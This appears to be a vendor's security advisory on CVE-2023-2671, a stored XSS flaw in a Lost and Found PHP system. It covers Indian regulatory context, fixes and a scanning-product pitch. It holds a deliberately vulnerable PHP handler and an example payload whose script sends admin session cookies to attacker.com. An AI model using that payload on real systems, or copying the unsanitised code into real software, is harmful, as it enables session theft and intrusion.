XSS Vulnerability in Lost & Found Systems: How Indian SMBs Are at Risk

What Happened

A cross-site scripting (XSS) vulnerability was discovered in SourceCodester's Lost and Found Information System version 1.0—a popular open-source platform used by Indian colleges, hospitals, hotels, and logistics companies to manage lost item reports and recovery inquiries.

The vulnerability (CVE-2023-2671) exists in the contact form handler located at classes/Master.php?f=save_inquiry. The flaw allows attackers to inject malicious JavaScript code through seemingly innocent form fields like fullname, contact, and message. When a staff member or administrator views these inquiries, the malicious script executes in their browser, potentially stealing session tokens, admin credentials, or triggering further attacks.

What makes this particularly dangerous: the vulnerability is remotely exploitable—an attacker needs no special access, just internet connectivity. The exploit code has already been publicly disclosed, meaning threat actors are actively scanning for vulnerable installations. In India's fragmented SMB ecosystem, where many organizations run outdated open-source software without regular security updates, this is an active threat.

Why This Matters for Indian Businesses

If you're running a college, hospital, hotel, or any organization using open-source systems like SourceCodester's Lost and Found, you face both operational and regulatory risk.

Regulatory Exposure

Under the Digital Personal Data Protection (DPDP) Act, 2023, organizations must implement reasonable security measures to protect personal data. An XSS vulnerability that exposes student names, phone numbers, email addresses, or medical information violates this obligation. The DPDP Act mandates data protection by design, incident notification within 72 hours if personal data is breached, and significant financial penalties for non-compliance.

Under CERT-In Directions 2022, organizations have 6 hours to notify CERT-In of any cybersecurity incident affecting critical infrastructure or sensitive data. Educational institutions and healthcare facilities fall under this scope.

Real-World Impact for Indian SMBs

Here's how a stored XSS attack typically cascades in practice:

1. Attacker injects malicious script into a lost item inquiry form
2. Admin logs in to review inquiries — the script steals their session cookie
3. Attacker uses the stolen admin session to access sensitive databases or create backdoor accounts
4. Weeks later, the organization discovers unauthorized access to student records, patient data, or financial information
5. The organization must notify affected individuals, file CERT-In reports, and face potential DPDP penalties

Who Is Vulnerable?

1. Educational institutions using open-source lost-and-found or inquiry systems
2. Hospitals and clinics tracking lost medical equipment or patient belongings
3. Hotels and resorts managing guest lost-item inquiries
4. Logistics and courier companies using similar open-source platforms
5. Government offices and municipal corporations with public inquiry systems

Technical Breakdown

The Attack Flow

graph TD
    A[Attacker crafts malicious inquiry] -->|XSS payload in fullname/message| B[Form submitted to Master.php]
    B -->|payload stored in database unsanitized| C[Admin views inquiry dashboard]
    C -->|JavaScript executes in admin browser| D[Session cookie stolen]
    D -->|attacker impersonates admin| E[Unauthorized data access]
    E -->|student/patient records exfiltrated| F[DPDP violation + CERT-In incident]
    style A fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style C fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style D fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style E fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style F fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style B fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0

The Vulnerable Code Pattern

<?php
// VULNERABLE CODE - DO NOT USE
if($_GET['f'] == 'save_inquiry') {
    $fullname = $_POST['fullname'];      // No sanitization
    $contact = $_POST['contact'];        // No validation
    $message = $_POST['message'];        // Direct input
    
    // Stored directly in database
    $query = "INSERT INTO inquiries (fullname, contact, message) VALUES ('$fullname', '$contact', '$message')";
    mysqli_query($conn, $query);
    
    // Later, when admin views the inquiry:
    echo "<h3>" . $row['fullname'] . "</h3>";  // XSS HERE!
    echo "<p>" . $row['message'] . "</p>";     // And here!
}
?>

Example Malicious Payload

An attacker submits a form like this:

<input name="fullname" value="Lost Phone<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>">

When an admin views this inquiry, the JavaScript executes, sending their session cookie to the attacker's server. From there, the attacker can forge admin requests, access the entire database, modify or delete records, and create persistent backdoor accounts.

How to Protect Your Business

Immediate Actions

Check if you're running the vulnerable system:

# Look for Master.php in web directories
find /var/www -name "Master.php" -type f 2>/dev/null

# Check for the vulnerable endpoint pattern
grep -r "save_inquiry" /var/www/ 2>/dev/null

Temporarily restrict access while patching:

# Block access via nginx
location /classes/ {
    deny all;
}

Update to the latest version from the vendor.

Long-Term Fix: Input Validation and Output Encoding

<?php
// SECURE CODE
if($_GET['f'] == 'save_inquiry') {
    $fullname = trim($_POST['fullname'] ?? '');
    $contact = trim($_POST['contact'] ?? '');
    $message = trim($_POST['message'] ?? '');
    
    // Validate fullname (letters and spaces only)
    if (!preg_match('/^[a-zA-Z\s]{2,100}$/', $fullname)) {
        die('Invalid fullname');
    }
    
    // Validate contact number
    if (!preg_match('/^[0-9]{10}$/', $contact)) {
        die('Invalid contact number');
    }
    
    // Use prepared statements to prevent SQL injection too
    $stmt = $conn->prepare("INSERT INTO inquiries (fullname, contact, message) VALUES (?, ?, ?)");
    $stmt->bind_param('sss', $fullname, $contact, $message);
    $stmt->execute();
    $stmt->close();
}

// Always encode output when displaying user-supplied data
echo "<h3>" . htmlspecialchars($row['fullname'], ENT_QUOTES, 'UTF-8') . "</h3>";
echo "<p>" . htmlspecialchars($row['message'], ENT_QUOTES, 'UTF-8') . "</p>";
?>

Enable Content Security Policy

# Nginx — prevents inline script execution even if XSS payload is injected
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:;" always;

# Additional security headers
add_header X-Frame-Options "SAMEORIGIN" always;
add_header X-Content-Type-Options "nosniff" always;

XSS Prevention Checklist for Indian SMBs

How Bachao.AI Helps Detect XSS

Bachao.AI by Dhisattva AI Pvt Ltd automates XSS detection as part of VAPT scanning. For a system like the one affected by CVE-2023-2671, the scan would:

1. Crawl all forms and identify injectable parameters
2. Submit XSS payloads into fullname, contact, and message fields
3. Check whether payloads execute when viewed in an admin context (stored XSS detection)
4. Flag the vulnerability with CVSS severity, remediation steps, and OWASP category mapping
5. Generate a DPDP-aligned report documenting the personal data exposure risk

Action Plan

This week:

1. [ ] Check if your system uses SourceCodester Lost and Found v1.0
2. [ ] Search for Master.php with save_inquiry endpoints
3. [ ] Apply output encoding (htmlspecialchars) to all displayed user data

1. [ ] Replace all SQL string concatenation with prepared statements
2. [ ] Add Content Security Policy headers
3. [ ] Schedule a VAPT scan to identify all injection flaws across your applications

1. [ ] Subscribe to CERT-In advisories
2. [ ] Monitor OWASP Top 10 updates for emerging vulnerability classes
3. [ ] Train developers on secure coding (input validation and output encoding fundamentals)

Frequently Asked Questions

What is cross-site scripting (XSS)? Cross-site scripting (XSS) is a vulnerability where an attacker injects malicious JavaScript into a web application. When another user (often an admin) views the injected content, the script executes in their browser — potentially stealing credentials, session tokens, or triggering further attacks.

What is CVE-2023-2671? CVE-2023-2671 is a stored XSS vulnerability in SourceCodester Lost and Found Information System v1.0. The fullname, contact, and message fields in classes/Master.php?f=save_inquiry are stored without sanitization and rendered without encoding, allowing attackers to execute JavaScript in admin browsers.

What is the difference between stored and reflected XSS? Stored XSS (like CVE-2023-2671) persists in the database and executes for every user who views the affected page. Reflected XSS is triggered only when a victim clicks a crafted link. Stored XSS is generally more severe because it requires no victim interaction beyond normal site usage.

Does this affect Indian businesses specifically? Yes. Open-source systems from SourceCodester and similar repositories are widely deployed across Indian educational institutions, hospitals, and SMBs. Under India's DPDP Act 2023, storing personal data in a system with known XSS vulnerabilities constitutes a failure of "reasonable security measures."

What should I do if I suspect my admin account has been compromised via XSS? Immediately invalidate all active sessions, rotate admin credentials, review database access logs, and notify CERT-In within 6 hours per CERT-In Directions 2022.

Protect your business with Bachao.AI — India's automated vulnerability assessment and penetration testing platform by Dhisattva AI Pvt Ltd, DPIIT Recognized Startup. Get a comprehensive security scan of your web applications and infrastructure. Visit Bachao.AI to get started.